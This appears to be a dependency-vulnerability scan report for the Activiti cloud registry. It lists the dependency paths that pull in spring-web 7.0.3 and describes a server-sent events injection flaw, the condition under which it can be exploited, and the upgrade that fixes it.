  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework.boot:spring-boot-servlet@4.1.0-RC1 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework:spring-webmvc@7.0.7 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3

Overview

org.springframework:spring-web is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.

Affected versions of this package are vulnerable to Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection'). The vulnerability exists in the handling of Server-Sent Events (SSE) when streaming plain text data. An attacker can inject crafted data into the event stream, breaking message boundaries and corrupting the stream delivered to other clients. By controlling streamed content, an attacker can manipulate how subsequent events are parsed by the client, potentially altering application state or injecting misleading data.

Note:

This is only exploitable if the application streams attacker-controlled data via SSE using unstructured/plain-text messages instead of a structured format (e.g., JSON).

Remediation

Upgrade org.springframework:spring-web to version 6.2.17, 7.0.6 or higher.

References

Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') vulnerability report